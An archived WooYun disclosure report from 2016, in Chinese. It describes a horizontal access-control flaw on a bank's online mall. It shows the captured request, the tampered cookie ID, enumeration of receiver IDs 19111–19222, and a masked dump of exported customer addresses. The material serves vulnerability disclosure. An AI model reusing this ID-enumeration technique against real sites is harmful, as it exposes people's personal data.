乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-26: 细节已通知厂商并且等待厂商处理中 2016-01-29: 厂商已经确认,细节仅向厂商公开 2016-02-08: 细节向核心白帽子及相关领域专家公开 2016-02-18: 细节向普通白帽子公开 2016-02-28: 细节向实习白帽子公开 2016-03-14: 细节向公众公开
朝阳银行某站平行越权(19k用户姓名/邮编/电话/地址)
朝阳银行网上商城主站平行越权
http://**.**.**.**/
购物时添加地址,抓包
POST /member/receiver/findById.jhtml HTTP/1.1Host: **.**.**.**Content-Length: 8Origin: http://**.**.**.**User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequesttoken: 7d62e825-e1dc-47d9-a396-8866f8fadea7Referer: http://**.**.**.**/member/order/info.jhtml?cartKey=8a67f1d1-11d1-4217-a14c-5cc302428a6e547dc6329597654fe5808d87acd301c8&receiverId=19727Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: id=19725
我们从19111~19222遍历下
导出看下
*****^^城内","ad**********uot;,"address":&quo**********uot;,"address":&quo**********^^街道","addres**********;,"address":"^**********;,"address":"文^**********"address":"明^**********^^街道","addres**********t;,"address":&**********^^","address&q**********^^","address&q**********^^华侨农场","**********","address":&**********","address":&**********"address":"湖^**********uot;address":"道北^**********dress":"绿源生态^**********,"address":"中^**********","address":&**********^内","address&q**********t;address":"开^**********uot;address":"西^**********^^镇","address&q**********^^镇","address&q**********uot;address":"黄桷^**********^^镇","address&q**********quot;address":"昌润路^**********^窝镇","add**********","address":&**********quot;address":"德^**********quot;address":"德^**********"address":"望^**********^","address&q**********^区","addres**********^^","address&q**********t;,"address":"^**********^^街道","addres**********;,"address":&quo**********;,"address":"^**********^","address"**********;,"address":"^**********ot;,"address":&quo**********;,"address":"^**********^^区","addres**********"address":"明^**********address":"安徽省六^**********t;address":"黄河八路^**********镇","address&q**********t;,"address":&quo**********;address":"新中大道^**********quot;address":"新中^**********,"address":"新^**********quot;address":"新延^**********uot;address":"领袖^**********;,"address":"^*****
危害等级:中
漏洞Rank:10
确认时间:2016-01-29 16:30
CNVD未复现所述情况,已经转由CNCERT向银行业信息化主管部门通报,由其后续协调网站管理单位处置.
暂无